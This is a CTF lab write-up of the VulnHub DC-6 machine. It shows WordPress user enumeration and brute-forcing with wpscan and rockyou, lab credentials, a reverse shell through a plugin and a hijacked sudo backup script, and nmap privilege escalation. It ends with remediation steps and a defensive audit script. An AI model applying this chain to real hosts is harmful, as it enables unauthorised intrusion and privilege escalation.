vulnhub-DC-6

Published 2024-01-11 20:08:59, author: qingshanboy


An nmap scan shows ports 22 and 80 open.

Edit /etc/hosts so that wordy maps to the target IP 192.168.57.151.

wpscan --url http://wordy -e u

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)


sudo wpscan --url http://wordy -e u -U ../name.txt -P /usr/share/wordlists/rockyou.txt

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

Username: mark, Password: helpdesk01

Logged into the dashboard; this account is not an administrator. Looking around, there is an "active monitor" entry, presumably a plugin.


A quick web search immediately turns up: https://www.it2021.com/penetration/543.html

Tried it, and it can execute commands.


Try getting a reverse shell.


After getting the shell:

python -c 'import pty;pty.spawn("/bin/bash")'

There is a things-to-do.txt under /home/mark/stuff/.

cat it to have a look:


It looks like a newly added user; su to it succeeds.

graham GSo7isUM1D4


sudo -l shows a backup script that can be used; run it to see.


Running it shows:

/home/jens/backups.sh
tar: Removing leading `/' from member names
tar (child): backups.tar.gz: Cannot open: Permission denied
tar (child): Error is not recoverable: exiting now
tar: backups.tar.gz: Wrote only 4096 of 10240 bytes
tar: Child returned status 2
tar: Error is not recoverable: exiting now

Thought about it for a while without figuring it out; others simply modify backups.sh directly.

graham can run backups.sh as jens, so change it into a reverse shell and get a shell as the jens user.


sudo -l shows that nmap can be used for privilege escalation.


nmap can run scripts with --script.


The --interactive mode only exists in old versions.

Notes

This time I mainly got stuck brute-forcing the WordPress dashboard password (the wordlist was too large), and then at the backup script step, where I did not think of modifying backups.sh.

Looking now at ls -l backups.sh, both the owner and the group have write permission.

And graham belongs to the file's group devs, so graham has permission to modify backups.sh.


We can remove nmap from the sudo permissions:

visudo

Comment out the nmap line.


And take the group write permission away from backups.sh:

chmod g-w backups.sh
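As an added example (not code from the original write-up), a small POSIX shell audit for the condition described above: a script that sudo runs as another user but that the invoking user can still write, through the owner bit, group membership (graham in devs) or the world-writable bit. It assumes GNU coreutils stat -c and Linux id; the invoker/run-as/script triple from the sudoers rule is supplied by the caller.

```shell
#!/bin/sh
# Added audit for the weakness noted above: sudo lets graham run
# /home/jens/backups.sh as jens while graham, via group devs, can edit it.
# Not code from the original write-up. Assumes GNU coreutils (stat -c) and
# Linux id(1); the sudoers rule itself is passed in by the caller.

# digit_has_write DIGIT -> true if an octal permission digit has the write bit
digit_has_write() { [ $(( $1 & 2 )) -ne 0 ]; }

# can_write FILE USER
# 0 = USER (name or uid) can modify FILE through the owner, group or other
# write bit; 1 = cannot; 2 = FILE missing or USER unknown. Ignores root and ACLs.
can_write() {
  file=$1 user=$2
  [ -f "$file" ] || return 2
  uid=$(id -u "$user" 2>/dev/null) || return 2
  user_gids=$(id -G "$user")
  owner=$(stat -c %u "$file")
  fgid=$(stat -c %g "$file")
  mode=$(stat -c %a "$file")
  # keep the last three octal digits: owner, group, other (drops setuid/setgid/sticky)
  mode=$(printf '%s' "$mode" | tail -c 3)
  u=$(printf '%s' "$mode" | cut -c1)
  g=$(printf '%s' "$mode" | cut -c2)
  o=$(printf '%s' "$mode" | cut -c3)
  if [ "$owner" = "$uid" ]; then digit_has_write "$u" && return 0; fi
  case " $user_gids " in *" $fgid "*) digit_has_write "$g" && return 0 ;; esac
  digit_has_write "$o" && return 0
  return 1
}

# audit_sudo_script INVOKER RUNAS SCRIPT
# Reports a finding when INVOKER can edit SCRIPT although sudo runs it as RUNAS.
# Returns 0 on a finding, 1 when the script is safe, 2 when it cannot be checked.
audit_sudo_script() {
  invoker=$1 runas=$2 script=$3
  rc=0
  can_write "$script" "$invoker" || rc=$?
  case $rc in
    0) echo "FINDING: $invoker can modify $script, which sudo runs as $runas"
       echo "  fix: chmod go-w $script (and make $runas its owner), or drop the rule"
       return 0 ;;
    1) echo "ok: $script is not writable by $invoker"; return 1 ;;
    *) echo "error: cannot inspect $script or user $invoker"; return 2 ;;
  esac
}

# The DC-6 case (only meaningful on that box): graham runs backups.sh as jens
# audit_sudo_script graham jens /home/jens/backups.sh
```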